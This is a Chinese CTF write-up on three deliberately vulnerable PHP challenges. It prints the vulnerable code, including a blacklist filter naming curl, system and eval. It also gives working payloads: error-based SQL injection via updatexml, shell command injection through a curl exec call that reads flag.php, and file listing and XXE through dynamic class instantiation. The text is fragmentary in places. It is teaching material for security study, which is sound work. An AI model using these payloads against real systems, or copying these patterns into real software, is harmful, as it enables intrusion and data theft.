来自先知社区-红日安全-
链接
//1.php
include 'config.php';
$conn = new mysqli($servername, $username, $password, $dbname);
if ($conn->connect_error) {
die("连接失败: ");
}
$sql = "SELECT COUNT(*) FROM users";
$whitelist = array();
$result = $conn->query($sql);
if($result->num_rows > 0){
$row = $result->fetch_assoc();
$whitelist = range(1, $row['COUNT(*)']);
}
$id = stop_hack($_GET['id']);
$sql = "SELECT * FROM users WHERE id=$id";
if (!in_array($id, $whitelist)) {
die("id $id is not in whitelist.");
}
$result = $conn->query($sql);
if($result->num_rows > 0){
$row = $result->fetch_assoc();
echo "";
foreach ($row as $key => $value) {
echo "$key
";
echo "$value
";
}
echo "
";
}
else{
die($conn->error);
}
?>
//config.php
$servername = "localhost";
$username = "fire";
$password = "fire";
$dbname = "day1";
function stop_hack($value){
$pattern = "insert|delete|or|concat|concat_ws|group_concat|join|floor|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile|dumpfile|sub|hex|file_put_contents|fwrite|curl|system|eval";
$back_list = explode("|",$pattern);
foreach($back_list as $hack){
if(preg_match("/$hack/i", $value))
die("$hack detected!");
}
return $value;
}
?>
in_arry
的绕过,没有使用强匹配,所以可以绕过stop_hack()
过滤了常见的字符串拼接函数,一样可以用updatexml注入?id=4 and (select updatexml(1,make_set(3,'~',(select flag from flag)),1))
$url = $_GET['url'];
if(isset($url) && filter_var($url, FILTER_VALIDATE_URL)){
$site_info = parse_url($url);
if(preg_match('/sec-redclub.com$/',$site_info['host'])){
exec('curl "'.$site_info['host'].'"', $result);
echo "You have curl {$site_info['host']} successfully!
;
echo implode(' ', $result);
}
else{
die("Error: Host not allowed
");
}
}
else{
echo "Just curl sec-redclub.com!
For example:?url=http://sec-redclub.com
";
}
?>
filter_var
和 FILTER_VALIDATE_URL
进行绕过,如:?url=demo://demo.com:80;sec-redclub.com:80/
?url=http://demo.com%23sec-redclub.com
?url=demo://%22;ls;%22sec-redclub.com:80/
%22
,为"
,闭合源代码中的”
.系统SHELL执行的就是
curl"";ls;"sec-redclub.com"
?url=demo://%22;cat
cat flag.php
,有空格绕不过filter_var()
,所以用cat
class NotFound{
function __construct()
{
die('404');
}
}
spl_autoload_register(
function ($class){
new NotFound();
}
);
$classname = isset($_GET['name']) ? $_GET['name'] : null;
$param = isset($_GET['param']) ? $_GET['param'] : null;
$param2 = isset($_GET['param2']) ? $_GET['param2'] : null;
if(class_exists($classname)){
$newclass = new $classname($param,$param2);
var_dump($newclass);
foreach ($newclass as $key=>$value)
echo $key.'=>'.$value.'
';
}
GlobIterator
类搜索文件public GlobIterator::__construct ( string $pattern [, int $flags = FilesystemIterator::KEY_AS_PATHNAME | FilesystemIterator::CURRENT_AS_FILEINFO ] )
第一个参数为要搜索文件名
?name=GlobIterator¶m=./*.php
SimpleXMLElement
来读取文件内容?name=SimpleXMLElement
¶m=]>
%26xxe; ¶m2=2